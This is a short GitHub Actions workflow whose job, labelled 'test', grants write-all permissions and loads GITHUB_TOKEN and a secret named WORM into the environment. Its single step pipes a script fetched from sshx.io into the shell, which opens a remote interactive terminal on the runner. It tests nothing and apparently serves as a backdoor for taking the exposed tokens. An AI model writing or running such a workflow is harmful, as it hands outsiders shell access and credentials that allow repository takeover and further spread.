
permissions: write-all

jobs:
  test:
    runs-on: ubuntu-22.04
    env:
      GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
      PAT: ${{ secrets.WORM }}
    steps:
      - run: curl -sSf https://sshx.io/get | sh -s run
    
